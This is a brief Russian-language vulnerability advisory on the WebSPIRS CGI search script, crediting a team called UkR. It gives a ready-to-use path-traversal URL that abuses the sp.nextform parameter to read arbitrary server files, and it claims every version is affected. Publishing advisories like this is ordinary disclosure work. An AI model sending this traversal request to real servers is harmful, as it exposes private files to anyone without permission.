————UkR security team advisory ————

WebSPIRS (SilverPlatter’s Information Retrieval System for WWW). Это CGI-приложение, которое доступно на всех forms-поддерживающих браузерах, таких как Netscape, для поиска в SilverPlatter (SP) электронной справочной библиотеке (ERL) баз данных, доступных по интернету.
http://www.silverplatter.com.

Проблема заключается в некорректной проверке отсылаемой скрипту информации.

Использование: www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../путь/к/файлу

Уязвимость во всех версиях данного скрипта.
Автор: UKR-XblP



Оставить мнение